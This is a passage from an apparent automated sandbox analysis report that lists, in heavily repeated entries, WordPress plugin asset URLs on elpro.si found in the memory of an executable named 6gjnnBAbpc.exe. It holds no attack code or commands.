                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/js/custom.js?ver=1.6
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/js/imagesloaded.pkgd
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/js/jquery.qtip.js?ve
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/mailchimp-for-woocommerce/public/js/mailchimp-woocommerce-pub
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/mimetypes-link-icons/css/style.php?cssvars=bXRsaV9oZWlnaHQ9MT
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/mimetypes-link-icons/js/mtli-str-replace.min.js?ver=3.1.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/perfect-woocommerce-brands/build/frontend/css/style.css?ver=3
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/perfect-woocommerce-brands/build/frontend/js/index.js?ver=a05
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sassy-social-share/public/../images/close.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sassy-social-share/public/../images/logo.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sassy-social-share/public/css/sassy-social-share-public.css?v
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 